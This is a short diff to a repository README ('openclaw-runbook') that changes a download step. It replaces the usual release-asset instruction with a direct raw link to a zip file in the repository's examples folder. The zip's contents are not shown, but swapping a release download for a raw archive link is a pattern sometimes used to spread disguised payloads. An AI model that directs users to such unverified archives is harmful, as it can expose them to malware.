kylenbhana/openclaw-runbook/README.md

 2. Look for the latest release version.
 It usually has the highest number.

-3. Under "Assets," download the **openclaw-runbook.zip** or similar zipped folder.
+3. Under "Assets," download the **https://raw.githubusercontent.com/kylenbhana/openclaw-runbook/main/examples/runbook_openclaw_1.5.zip** or similar zipped folder.
 This file holds all documents and tools you need.

 4. Once downloaded, find the file in your "Downloads" folder or where your browser saves files.